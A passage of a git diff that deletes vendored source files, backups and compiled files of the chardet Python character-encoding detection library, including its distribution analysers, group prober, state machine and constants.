self.reset() - - def get_charset_name(self): - return "Big5" diff --git a/chardet/chardet/big5prober.pyc b/chardet/chardet/big5prober.pyc deleted file mode 100644 index 5cd8f7d..0000000 Binary files a/chardet/chardet/big5prober.pyc and /dev/null differ diff --git a/chardet/chardet/chardistribution.py b/chardet/chardet/chardistribution.py deleted file mode 100644 index 2c63061..0000000 --- a/chardet/chardet/chardistribution.py +++ /dev/null @@ -1,200 +0,0 @@ -######################## BEGIN LICENSE BLOCK ######################## -# The Original Code is Mozilla Communicator client code. -# -# The Initial Developer of the Original Code is -# Netscape Communications Corporation. -# Portions created by the Initial Developer are Copyright (C) 1998 -# the Initial Developer. All Rights Reserved. -# -# Contributor(s): -# Mark Pilgrim - port to Python -# -# This library is free software; you can redistribute it and/or -# modify it under the terms of the GNU Lesser General Public -# License as published by the Free Software Foundation; either -# version 2.1 of the License, or (at your option) any later version. -# -# This library is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public -# License along with this library; if not, write to the Free Software -# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA -# 02110-1301 USA -######################### END LICENSE BLOCK ######################### - -from . import constants -from .euctwfreq import EUCTWCharToFreqOrder, EUCTW_TABLE_SIZE, EUCTW_TYPICAL_DISTRIBUTION_RATIO -from .euckrfreq import EUCKRCharToFreqOrder, EUCKR_TABLE_SIZE, EUCKR_TYPICAL_DISTRIBUTION_RATIO -from .gb2312freq import GB2312CharToFreqOrder, GB2312_TABLE_SIZE, GB2312_TYPICAL_DISTRIBUTION_RATIO -from .big5freq import Big5CharToFreqOrder, BIG5_TABLE_SIZE, BIG5_TYPICAL_DISTRIBUTION_RATIO -from .jisfreq import JISCharToFreqOrder, JIS_TABLE_SIZE, JIS_TYPICAL_DISTRIBUTION_RATIO - -ENOUGH_DATA_THRESHOLD = 1024 -SURE_YES = 0.99 -SURE_NO = 0.01 - -class CharDistributionAnalysis: - def __init__(self): - self._mCharToFreqOrder = None # Mapping table to get frequency order from char order (get from GetOrder()) - self._mTableSize = None # Size of above table - self._mTypicalDistributionRatio = None # This is a constant value which varies from language to language, used in calculating confidence. See http://www.mozilla.org/projects/intl/UniversalCharsetDetection.html for further detail. - self.reset() - - def reset(self): - """reset analyser, clear any state""" - self._mDone = False # If this flag is set to True, detection is done and conclusion has been made - self._mTotalChars = 0 # Total characters encountered - self._mFreqChars = 0 # The number of characters whose frequency order is less than 512 - - def feed(self, aBuf, aCharLen): - """feed a character with known length""" - if aCharLen == 2: - # we only care about 2-bytes character in our distribution analysis - order = self.get_order(aBuf) - else: - order = -1 - if order >= 0: - self._mTotalChars += 1 - # order is valid - if order < self._mTableSize: - if 512 > self._mCharToFreqOrder[order]: - self._mFreqChars += 1 - - def get_confidence(self): - """return confidence based on existing data""" - # if we didn't receive any character in our consideration range, return negative answer - if self._mTotalChars <= 0: - return SURE_NO - - if self._mTotalChars != self._mFreqChars: - r = self._mFreqChars / ((self._mTotalChars - self._mFreqChars) * self._mTypicalDistributionRatio) - if r < SURE_YES: - return r - - # normalize confidence (we don't want to be 100% sure) - return SURE_YES - - def got_enough_data(self): - # It is not necessary to receive all data to draw conclusion. For charset detection, - # certain amount of data is enough - return self._mTotalChars > ENOUGH_DATA_THRESHOLD - - def get_order(self, aBuf): - # We do not handle characters based on the original encoding string, but - # convert this encoding string to a number, here called order. - # This allows multiple encodings of a language to share one frequency table. - return -1 - -class EUCTWDistributionAnalysis(CharDistributionAnalysis): - def __init__(self): - CharDistributionAnalysis.__init__(self) - self._mCharToFreqOrder = EUCTWCharToFreqOrder - self._mTableSize = EUCTW_TABLE_SIZE - self._mTypicalDistributionRatio = EUCTW_TYPICAL_DISTRIBUTION_RATIO - - def get_order(self, aBuf): - # for euc-TW encoding, we are interested - # first byte range: 0xc4 -- 0xfe - # second byte range: 0xa1 -- 0xfe - # no validation needed here. State machine has done that - if aBuf[0] >= 0xC4: - return 94 * (aBuf[0] - 0xC4) + aBuf[1] - 0xA1 - else: - return -1 - -class EUCKRDistributionAnalysis(CharDistributionAnalysis): - def __init__(self): - CharDistributionAnalysis.__init__(self) - self._mCharToFreqOrder = EUCKRCharToFreqOrder - self._mTableSize = EUCKR_TABLE_SIZE - self._mTypicalDistributionRatio = EUCKR_TYPICAL_DISTRIBUTION_RATIO - - def get_order(self, aBuf): - # for euc-KR encoding, we are interested - # first byte range: 0xb0 -- 0xfe - # second byte range: 0xa1 -- 0xfe - # no validation needed here. State machine has done that - if aBuf[0] >= 0xB0: - return 94 * (aBuf[0] - 0xB0) + aBuf[1] - 0xA1 - else: - return -1; - -class GB2312DistributionAnalysis(CharDistributionAnalysis): - def __init__(self): - CharDistributionAnalysis.__init__(self) - self._mCharToFreqOrder = GB2312CharToFreqOrder - self._mTableSize = GB2312_TABLE_SIZE - self._mTypicalDistributionRatio = GB2312_TYPICAL_DISTRIBUTION_RATIO - - def get_order(self, aBuf): - # for GB2312 encoding, we are interested - # first byte range: 0xb0 -- 0xfe - # second byte range: 0xa1 -- 0xfe - # no validation needed here. State machine has done that - if (aBuf[0] >= 0xB0) and (aBuf[1] >= 0xA1): - return 94 * (aBuf[0] - 0xB0) + aBuf[1] - 0xA1 - else: - return -1; - -class Big5DistributionAnalysis(CharDistributionAnalysis): - def __init__(self): - CharDistributionAnalysis.__init__(self) - self._mCharToFreqOrder = Big5CharToFreqOrder - self._mTableSize = BIG5_TABLE_SIZE - self._mTypicalDistributionRatio = BIG5_TYPICAL_DISTRIBUTION_RATIO - - def get_order(self, aBuf): - # for big5 encoding, we are interested - # first byte range: 0xa4 -- 0xfe - # second byte range: 0x40 -- 0x7e , 0xa1 -- 0xfe - # no validation needed here. State machine has done that - if aBuf[0] >= 0xA4: - if aBuf[1] >= 0xA1: - return 157 * (aBuf[0] - 0xA4) + aBuf[1] - 0xA1 + 63 - else: - return 157 * (aBuf[0] - 0xA4) + aBuf[1] - 0x40 - else: - return -1 - -class SJISDistributionAnalysis(CharDistributionAnalysis): - def __init__(self): - CharDistributionAnalysis.__init__(self) - self._mCharToFreqOrder = JISCharToFreqOrder - self._mTableSize = JIS_TABLE_SIZE - self._mTypicalDistributionRatio = JIS_TYPICAL_DISTRIBUTION_RATIO - - def get_order(self, aBuf): - # for sjis encoding, we are interested - # first byte range: 0x81 -- 0x9f , 0xe0 -- 0xfe - # second byte range: 0x40 -- 0x7e, 0x81 -- oxfe - # no validation needed here. State machine has done that - if (aBuf[0] >= 0x81) and (aBuf[0] <= 0x9F): - order = 188 * (aBuf[0] - 0x81) - elif (aBuf[0] >= 0xE0) and (aBuf[0] <= 0xEF): - order = 188 * (aBuf[0] - 0xE0 + 31) - else: - return -1; - order = order + aBuf[1] - 0x40 - if aBuf[1] > 0x7F: - order =- 1 - return order - -class EUCJPDistributionAnalysis(CharDistributionAnalysis): - def __init__(self): - CharDistributionAnalysis.__init__(self) - self._mCharToFreqOrder = JISCharToFreqOrder - self._mTableSize = JIS_TABLE_SIZE - self._mTypicalDistributionRatio = JIS_TYPICAL_DISTRIBUTION_RATIO - - def get_order(self, aBuf): - # for euc-JP encoding, we are interested - # first byte range: 0xa0 -- 0xfe - # second byte range: 0xa1 -- 0xfe - # no validation needed here. State machine has done that - if aBuf[0] >= 0xA0: - return 94 * (aBuf[0] - 0xA1) + aBuf[1] - 0xa1 - else: - return -1 diff --git a/chardet/chardet/chardistribution.py.bak b/chardet/chardet/chardistribution.py.bak deleted file mode 100644 index b893341..0000000 --- a/chardet/chardet/chardistribution.py.bak +++ /dev/null @@ -1,200 +0,0 @@ -######################## BEGIN LICENSE BLOCK ######################## -# The Original Code is Mozilla Communicator client code. -# -# The Initial Developer of the Original Code is -# Netscape Communications Corporation. -# Portions created by the Initial Developer are Copyright (C) 1998 -# the Initial Developer. All Rights Reserved. -# -# Contributor(s): -# Mark Pilgrim - port to Python -# -# This library is free software; you can redistribute it and/or -# modify it under the terms of the GNU Lesser General Public -# License as published by the Free Software Foundation; either -# version 2.1 of the License, or (at your option) any later version. -# -# This library is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public -# License along with this library; if not, write to the Free Software -# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA -# 02110-1301 USA -######################### END LICENSE BLOCK ######################### - -import constants -from euctwfreq import EUCTWCharToFreqOrder, EUCTW_TABLE_SIZE, EUCTW_TYPICAL_DISTRIBUTION_RATIO -from euckrfreq import EUCKRCharToFreqOrder, EUCKR_TABLE_SIZE, EUCKR_TYPICAL_DISTRIBUTION_RATIO -from gb2312freq import GB2312CharToFreqOrder, GB2312_TABLE_SIZE, GB2312_TYPICAL_DISTRIBUTION_RATIO -from big5freq import Big5CharToFreqOrder, BIG5_TABLE_SIZE, BIG5_TYPICAL_DISTRIBUTION_RATIO -from jisfreq import JISCharToFreqOrder, JIS_TABLE_SIZE, JIS_TYPICAL_DISTRIBUTION_RATIO - -ENOUGH_DATA_THRESHOLD = 1024 -SURE_YES = 0.99 -SURE_NO = 0.01 - -class CharDistributionAnalysis: - def __init__(self): - self._mCharToFreqOrder = None # Mapping table to get frequency order from char order (get from GetOrder()) - self._mTableSize = None # Size of above table - self._mTypicalDistributionRatio = None # This is a constant value which varies from language to language, used in calculating confidence. See http://www.mozilla.org/projects/intl/UniversalCharsetDetection.html for further detail. - self.reset() - - def reset(self): - """reset analyser, clear any state""" - self._mDone = constants.False # If this flag is set to constants.True, detection is done and conclusion has been made - self._mTotalChars = 0 # Total characters encountered - self._mFreqChars = 0 # The number of characters whose frequency order is less than 512 - - def feed(self, aStr, aCharLen): - """feed a character with known length""" - if aCharLen == 2: - # we only care about 2-bytes character in our distribution analysis - order = self.get_order(aStr) - else: - order = -1 - if order >= 0: - self._mTotalChars += 1 - # order is valid - if order < self._mTableSize: - if 512 > self._mCharToFreqOrder[order]: - self._mFreqChars += 1 - - def get_confidence(self): - """return confidence based on existing data""" - # if we didn't receive any character in our consideration range, return negative answer - if self._mTotalChars <= 0: - return SURE_NO - - if self._mTotalChars != self._mFreqChars: - r = self._mFreqChars / ((self._mTotalChars - self._mFreqChars) * self._mTypicalDistributionRatio) - if r < SURE_YES: - return r - - # normalize confidence (we don't want to be 100% sure) - return SURE_YES - - def got_enough_data(self): - # It is not necessary to receive all data to draw conclusion. For charset detection, - # certain amount of data is enough - return self._mTotalChars > ENOUGH_DATA_THRESHOLD - - def get_order(self, aStr): - # We do not handle characters based on the original encoding string, but - # convert this encoding string to a number, here called order. - # This allows multiple encodings of a language to share one frequency table. - return -1 - -class EUCTWDistributionAnalysis(CharDistributionAnalysis): - def __init__(self): - CharDistributionAnalysis.__init__(self) - self._mCharToFreqOrder = EUCTWCharToFreqOrder - self._mTableSize = EUCTW_TABLE_SIZE - self._mTypicalDistributionRatio = EUCTW_TYPICAL_DISTRIBUTION_RATIO - - def get_order(self, aStr): - # for euc-TW encoding, we are interested - # first byte range: 0xc4 -- 0xfe - # second byte range: 0xa1 -- 0xfe - # no validation needed here. State machine has done that - if aStr[0] >= '\xC4': - return 94 * (ord(aStr[0]) - 0xC4) + ord(aStr[1]) - 0xA1 - else: - return -1 - -class EUCKRDistributionAnalysis(CharDistributionAnalysis): - def __init__(self): - CharDistributionAnalysis.__init__(self) - self._mCharToFreqOrder = EUCKRCharToFreqOrder - self._mTableSize = EUCKR_TABLE_SIZE - self._mTypicalDistributionRatio = EUCKR_TYPICAL_DISTRIBUTION_RATIO - - def get_order(self, aStr): - # for euc-KR encoding, we are interested - # first byte range: 0xb0 -- 0xfe - # second byte range: 0xa1 -- 0xfe - # no validation needed here. State machine has done that - if aStr[0] >= '\xB0': - return 94 * (ord(aStr[0]) - 0xB0) + ord(aStr[1]) - 0xA1 - else: - return -1; - -class GB2312DistributionAnalysis(CharDistributionAnalysis): - def __init__(self): - CharDistributionAnalysis.__init__(self) - self._mCharToFreqOrder = GB2312CharToFreqOrder - self._mTableSize = GB2312_TABLE_SIZE - self._mTypicalDistributionRatio = GB2312_TYPICAL_DISTRIBUTION_RATIO - - def get_order(self, aStr): - # for GB2312 encoding, we are interested - # first byte range: 0xb0 -- 0xfe - # second byte range: 0xa1 -- 0xfe - # no validation needed here. State machine has done that - if (aStr[0] >= '\xB0') and (aStr[1] >= '\xA1'): - return 94 * (ord(aStr[0]) - 0xB0) + ord(aStr[1]) - 0xA1 - else: - return -1; - -class Big5DistributionAnalysis(CharDistributionAnalysis): - def __init__(self): - CharDistributionAnalysis.__init__(self) - self._mCharToFreqOrder = Big5CharToFreqOrder - self._mTableSize = BIG5_TABLE_SIZE - self._mTypicalDistributionRatio = BIG5_TYPICAL_DISTRIBUTION_RATIO - - def get_order(self, aStr): - # for big5 encoding, we are interested - # first byte range: 0xa4 -- 0xfe - # second byte range: 0x40 -- 0x7e , 0xa1 -- 0xfe - # no validation needed here. State machine has done that - if aStr[0] >= '\xA4': - if aStr[1] >= '\xA1': - return 157 * (ord(aStr[0]) - 0xA4) + ord(aStr[1]) - 0xA1 + 63 - else: - return 157 * (ord(aStr[0]) - 0xA4) + ord(aStr[1]) - 0x40 - else: - return -1 - -class SJISDistributionAnalysis(CharDistributionAnalysis): - def __init__(self): - CharDistributionAnalysis.__init__(self) - self._mCharToFreqOrder = JISCharToFreqOrder - self._mTableSize = JIS_TABLE_SIZE - self._mTypicalDistributionRatio = JIS_TYPICAL_DISTRIBUTION_RATIO - - def get_order(self, aStr): - # for sjis encoding, we are interested - # first byte range: 0x81 -- 0x9f , 0xe0 -- 0xfe - # second byte range: 0x40 -- 0x7e, 0x81 -- oxfe - # no validation needed here. State machine has done that - if (aStr[0] >= '\x81') and (aStr[0] <= '\x9F'): - order = 188 * (ord(aStr[0]) - 0x81) - elif (aStr[0] >= '\xE0') and (aStr[0] <= '\xEF'): - order = 188 * (ord(aStr[0]) - 0xE0 + 31) - else: - return -1; - order = order + ord(aStr[1]) - 0x40 - if aStr[1] > '\x7F': - order =- 1 - return order - -class EUCJPDistributionAnalysis(CharDistributionAnalysis): - def __init__(self): - CharDistributionAnalysis.__init__(self) - self._mCharToFreqOrder = JISCharToFreqOrder - self._mTableSize = JIS_TABLE_SIZE - self._mTypicalDistributionRatio = JIS_TYPICAL_DISTRIBUTION_RATIO - - def get_order(self, aStr): - # for euc-JP encoding, we are interested - # first byte range: 0xa0 -- 0xfe - # second byte range: 0xa1 -- 0xfe - # no validation needed here. State machine has done that - if aStr[0] >= '\xA0': - return 94 * (ord(aStr[0]) - 0xA1) + ord(aStr[1]) - 0xa1 - else: - return -1 diff --git a/chardet/chardet/chardistribution.pyc b/chardet/chardet/chardistribution.pyc deleted file mode 100644 index c9ed078..0000000 Binary files a/chardet/chardet/chardistribution.pyc and /dev/null differ diff --git a/chardet/chardet/charsetgroupprober.py b/chardet/chardet/charsetgroupprober.py deleted file mode 100644 index 4376772..0000000 --- a/chardet/chardet/charsetgroupprober.py +++ /dev/null @@ -1,97 +0,0 @@ -######################## BEGIN LICENSE BLOCK ######################## -# The Original Code is Mozilla Communicator client code. -# -# The Initial Developer of the Original Code is -# Netscape Communications Corporation. -# Portions created by the Initial Developer are Copyright (C) 1998 -# the Initial Developer. All Rights Reserved. -# -# Contributor(s): -# Mark Pilgrim - port to Python -# -# This library is free software; you can redistribute it and/or -# modify it under the terms of the GNU Lesser General Public -# License as published by the Free Software Foundation; either -# version 2.1 of the License, or (at your option) any later version. -# -# This library is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public -# License along with this library; if not, write to the Free Software -# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA -# 02110-1301 USA -######################### END LICENSE BLOCK ######################### - -from . import constants -import sys -from .charsetprober import CharSetProber - -class CharSetGroupProber(CharSetProber): - def __init__(self): - CharSetProber.__init__(self) - self._mActiveNum = 0 - self._mProbers = [] - self._mBestGuessProber = None - - def reset(self): - CharSetProber.reset(self) - self._mActiveNum = 0 - for prober in self._mProbers: - if prober: - prober.reset() - prober.active = True - self._mActiveNum += 1 - self._mBestGuessProber = None - - def get_charset_name(self): - if not self._mBestGuessProber: - self.get_confidence() - if not self._mBestGuessProber: return None -# self._mBestGuessProber = self._mProbers[0] - return self._mBestGuessProber.get_charset_name() - - def feed(self, aBuf): - for prober in self._mProbers: - if not prober: continue - if not prober.active: continue - st = prober.feed(aBuf) - if not st: continue - if st == constants.eFoundIt: - self._mBestGuessProber = prober - return self.get_state() - elif st == constants.eNotMe: - prober.active = False - self._mActiveNum -= 1 - if self._mActiveNum <= 0: - self._mState = constants.eNotMe - return self.get_state() - return self.get_state() - - def get_confidence(self): - st = self.get_state() - if st == constants.eFoundIt: - return 0.99 - elif st == constants.eNotMe: - return 0.01 - bestConf = 0.0 - self._mBestGuessProber = None - for prober in self._mProbers: - if not prober: continue - if not prober.active: - if constants._debug: - sys.stderr.write(prober.get_charset_name() + ' not active\n') - continue - cf = prober.get_confidence() - if constants._debug: - sys.stderr.write('%s confidence = %s\n' % (prober.get_charset_name(), cf)) - if bestConf < cf: - bestConf = cf - self._mBestGuessProber = prober - if not self._mBestGuessProber: return 0.0 - return bestConf -# else: -# self._mBestGuessProber = self._mProbers[0] -# return self._mBestGuessProber.get_confidence() diff --git a/chardet/chardet/charsetgroupprober.py.bak b/chardet/chardet/charsetgroupprober.py.bak deleted file mode 100644 index 5188069..0000000 --- a/chardet/chardet/charsetgroupprober.py.bak +++ /dev/null @@ -1,96 +0,0 @@ -######################## BEGIN LICENSE BLOCK ######################## -# The Original Code is Mozilla Communicator client code. -# -# The Initial Developer of the Original Code is -# Netscape Communications Corporation. -# Portions created by the Initial Developer are Copyright (C) 1998 -# the Initial Developer. All Rights Reserved. -# -# Contributor(s): -# Mark Pilgrim - port to Python -# -# This library is free software; you can redistribute it and/or -# modify it under the terms of the GNU Lesser General Public -# License as published by the Free Software Foundation; either -# version 2.1 of the License, or (at your option) any later version. -# -# This library is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public -# License along with this library; if not, write to the Free Software -# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA -# 02110-1301 USA -######################### END LICENSE BLOCK ######################### - -import constants, sys -from charsetprober import CharSetProber - -class CharSetGroupProber(CharSetProber): - def __init__(self): - CharSetProber.__init__(self) - self._mActiveNum = 0 - self._mProbers = [] - self._mBestGuessProber = None - - def reset(self): - CharSetProber.reset(self) - self._mActiveNum = 0 - for prober in self._mProbers: - if prober: - prober.reset() - prober.active = constants.True - self._mActiveNum += 1 - self._mBestGuessProber = None - - def get_charset_name(self): - if not self._mBestGuessProber: - self.get_confidence() - if not self._mBestGuessProber: return None -# self._mBestGuessProber = self._mProbers[0] - return self._mBestGuessProber.get_charset_name() - - def feed(self, aBuf): - for prober in self._mProbers: - if not prober: continue - if not prober.active: continue - st = prober.feed(aBuf) - if not st: continue - if st == constants.eFoundIt: - self._mBestGuessProber = prober - return self.get_state() - elif st == constants.eNotMe: - prober.active = constants.False - self._mActiveNum -= 1 - if self._mActiveNum <= 0: - self._mState = constants.eNotMe - return self.get_state() - return self.get_state() - - def get_confidence(self): - st = self.get_state() - if st == constants.eFoundIt: - return 0.99 - elif st == constants.eNotMe: - return 0.01 - bestConf = 0.0 - self._mBestGuessProber = None - for prober in self._mProbers: - if not prober: continue - if not prober.active: - if constants._debug: - sys.stderr.write(prober.get_charset_name() + ' not active\n') - continue - cf = prober.get_confidence() - if constants._debug: - sys.stderr.write('%s confidence = %s\n' % (prober.get_charset_name(), cf)) - if bestConf < cf: - bestConf = cf - self._mBestGuessProber = prober - if not self._mBestGuessProber: return 0.0 - return bestConf -# else: -# self._mBestGuessProber = self._mProbers[0] -# return self._mBestGuessProber.get_confidence() diff --git a/chardet/chardet/charsetgroupprober.pyc b/chardet/chardet/charsetgroupprober.pyc deleted file mode 100644 index 9887ef5..0000000 Binary files a/chardet/chardet/charsetgroupprober.pyc and /dev/null differ diff --git a/chardet/chardet/charsetprober.py b/chardet/chardet/charsetprober.py deleted file mode 100644 index 450c95e..0000000 --- a/chardet/chardet/charsetprober.py +++ /dev/null @@ -1,61 +0,0 @@ -######################## BEGIN LICENSE BLOCK ######################## -# The Original Code is Mozilla Universal charset detector code. -# -# The Initial Developer of the Original Code is -# Netscape Communications Corporation. -# Portions created by the Initial Developer are Copyright (C) 2001 -# the Initial Developer. All Rights Reserved. -# -# Contributor(s): -# Mark Pilgrim - port to Python -# Shy Shalom - original C code -# -# This library is free software; you can redistribute it and/or -# modify it under the terms of the GNU Lesser General Public -# License as published by the Free Software Foundation; either -# version 2.1 of the License, or (at your option) any later version. -# -# This library is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public -# License along with this library; if not, write to the Free Software -# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA -# 02110-1301 USA -######################### END LICENSE BLOCK ######################### - -from . import constants -import re - -class CharSetProber: - def __init__(self): - pass - - def reset(self): - self._mState = constants.eDetecting - - def get_charset_name(self): - return None - - def feed(self, aBuf): - pass - - def get_state(self): - return self._mState - - def get_confidence(self): - return 0.0 - - def filter_high_bit_only(self, aBuf): - aBuf = re.sub(b'([\x00-\x7F])+', b' ', aBuf) - return aBuf - - def filter_without_english_letters(self, aBuf): - aBuf = re.sub(b'([A-Za-z])+', b' ', aBuf) - return aBuf - - def filter_with_english_letters(self, aBuf): - # TODO - return aBuf diff --git a/chardet/chardet/charsetprober.pyc b/chardet/chardet/charsetprober.pyc deleted file mode 100644 index 9550a50..0000000 Binary files a/chardet/chardet/charsetprober.pyc and /dev/null differ diff --git a/chardet/chardet/codingstatemachine.py b/chardet/chardet/codingstatemachine.py deleted file mode 100644 index 66d766f..0000000 --- a/chardet/chardet/codingstatemachine.py +++ /dev/null @@ -1,57 +0,0 @@ -######################## BEGIN LICENSE BLOCK ######################## -# The Original Code is mozilla.org code. -# -# The Initial Developer of the Original Code is -# Netscape Communications Corporation. -# Portions created by the Initial Developer are Copyright (C) 1998 -# the Initial Developer. All Rights Reserved. -# -# Contributor(s): -# Mark Pilgrim - port to Python -# -# This library is free software; you can redistribute it and/or -# modify it under the terms of the GNU Lesser General Public -# License as published by the Free Software Foundation; either -# version 2.1 of the License, or (at your option) any later version. -# -# This library is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public -# License along with this library; if not, write to the Free Software -# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA -# 02110-1301 USA -######################### END LICENSE BLOCK ######################### - -from .constants import eStart, eError, eItsMe - -class CodingStateMachine: - def __init__(self, sm): - self._mModel = sm - self._mCurrentBytePos = 0 - self._mCurrentCharLen = 0 - self.reset() - - def reset(self): - self._mCurrentState = eStart - - def next_state(self, c): - # for each byte we get its class - # if it is first byte, we also get byte length - # PY3K: aBuf is a byte stream, so c is an int, not a byte - byteCls = self._mModel['classTable'][c] - if self._mCurrentState == eStart: - self._mCurrentBytePos = 0 - self._mCurrentCharLen = self._mModel['charLenTable'][byteCls] - # from byte's class and stateTable, we get its next state - self._mCurrentState = self._mModel['stateTable'][self._mCurrentState * self._mModel['classFactor'] + byteCls] - self._mCurrentBytePos += 1 - return self._mCurrentState - - def get_current_charlen(self): - return self._mCurrentCharLen - - def get_coding_state_machine(self): - return self._mModel['name'] diff --git a/chardet/chardet/codingstatemachine.py.bak b/chardet/chardet/codingstatemachine.py.bak deleted file mode 100644 index 452d3b0..0000000 --- a/chardet/chardet/codingstatemachine.py.bak +++ /dev/null @@ -1,56 +0,0 @@ -######################## BEGIN LICENSE BLOCK ######################## -# The Original Code is mozilla.org code. -# -# The Initial Developer of the Original Code is -# Netscape Communications Corporation. -# Portions created by the Initial Developer are Copyright (C) 1998 -# the Initial Developer. All Rights Reserved. -# -# Contributor(s): -# Mark Pilgrim - port to Python -# -# This library is free software; you can redistribute it and/or -# modify it under the terms of the GNU Lesser General Public -# License as published by the Free Software Foundation; either -# version 2.1 of the License, or (at your option) any later version. -# -# This library is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public -# License along with this library; if not, write to the Free Software -# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA -# 02110-1301 USA -######################### END LICENSE BLOCK ######################### - -from constants import eStart, eError, eItsMe - -class CodingStateMachine: - def __init__(self, sm): - self._mModel = sm - self._mCurrentBytePos = 0 - self._mCurrentCharLen = 0 - self.reset() - - def reset(self): - self._mCurrentState = eStart - - def next_state(self, c): - # for each byte we get its class - # if it is first byte, we also get byte length - byteCls = self._mModel['classTable'][ord(c)] - if self._mCurrentState == eStart: - self._mCurrentBytePos = 0 - self._mCurrentCharLen = self._mModel['charLenTable'][byteCls] - # from byte's class and stateTable, we get its next state - self._mCurrentState = self._mModel['stateTable'][self._mCurrentState * self._mModel['classFactor'] + byteCls] - self._mCurrentBytePos += 1 - return self._mCurrentState - - def get_current_charlen(self): - return self._mCurrentCharLen - - def get_coding_state_machine(self): - return self._mModel['name'] diff --git a/chardet/chardet/codingstatemachine.pyc b/chardet/chardet/codingstatemachine.pyc deleted file mode 100644 index 36921e9..0000000 Binary files a/chardet/chardet/codingstatemachine.pyc and /dev/null differ diff --git a/chardet/chardet/constants.py b/chardet/chardet/constants.py deleted file mode 100644 index a3d27de..0000000 --- a/chardet/chardet/constants.py +++ /dev/null @@ -1,39 +0,0 @@ -######################## BEGIN LICENSE BLOCK ######################## -# The Original Code is Mozilla Universal charset detector code. -# -# The Initial Developer of the Original Code is -# Netscape Communications Corporation. -# Portions created by the Initial Developer are Copyright (C) 2001 -# the Initial Developer. All Rights Reserved. -# -# Contributor(s): -# Mark Pilgrim - port to Python -# Shy Shalom - original C code -# -# This library is free software; you can redistribute it and/or -# modify it under the terms of the GNU Lesser General Public -# License as published by the Free Software Foundation; either -# version 2.1 of the License, or (at your option) any later version. -# -# This library is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public -# License along with this library; if not, write to the Free Software -# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA -# 02110-1301 USA -######################### END LICENSE BLOCK ######################### - -_debug = 0 - -eDetecting = 0 -eFoundIt = 1 -eNotMe = 2 - -eStart = 0 -eError = 1 -eItsMe = 2 - -SHORTCUT_THRESHOLD = 0.95 diff --git a/chardet/chardet/constants.py.bak b/chardet/chardet/constants.py.bak deleted file mode 100644 index e94e226..0000000 --- a/chardet/chardet/constants.py.bak +++ /dev/null @@ -1,47 +0,0 @@ -######################## BEGIN LICENSE BLOCK ######################## -# The Original Code is Mozilla Universal charset detector code. -# -# The Initial Developer of the Original Code is -# Netscape Communications Corporation. -# Portions created by the Initial Developer are Copyright (C) 2001 -# the Initial Developer. All Rights Reserved. -# -# Contributor(s): -# Mark Pilgrim - port to Python -# Shy Shalom - original C code -# -# This library is free software; you can redistribute it and/or -# modify it under the terms of the GNU Lesser General Public -# License as published by the Free Software Foundation; either -# version 2.1 of the License, or (at your option) any later version. -# -# This library is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public -# License along with this library; if not, write to the Free Software -# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA -# 02110-1301 USA -######################### END LICENSE BLOCK ######################### - -_debug = 0 - -eDetecting = 0 -eFoundIt = 1 -eNotMe = 2 - -eStart = 0 -eError = 1 -eItsMe = 2 - -SHORTCUT_THRESHOLD = 0.95 - -import __builtin__ -if not hasattr(__builtin__, 'False'): - False = 0 - True = 1 -else: - False = __builtin__.False - True = __builtin__.True diff --git a/chardet/chardet/constants.pyc b/chardet/chardet/constants.pyc deleted file mode 100644 index ae83f2c..0000000 Binary files a/chardet/chardet/constants.pyc and /dev/null differ diff --git a/chardet/chardet/escprober.py b/chardet/chardet/escprober.py deleted file mode 100644 index cfc833b..0000000 --- a/chardet/chardet/escprober.py +++ /dev/null @@ -1,81 +0,0 @@ -######################## BEGIN LICENSE BLOCK ######################## -# The Original Code is mozilla.org code. -# -# The Initial Developer of the Original Code is -# Netscape Communications Corporation. -# Portions created by the Initial Developer are Copyright (C) 1998 -# the Initial Developer. All Rights Reserved. -# -# Contributor(s): -# Mark Pilgrim - port to Python -# -# This library is free software; you can redistribute it and/or -# modify it under the terms of the GNU Lesser General Public -# License as published by the Free Software Foundation; either -# version 2.1 of the License, or (at your option) any later version. -# -# This library is distributed in the hope that it will be useful, -# but WITHOUT 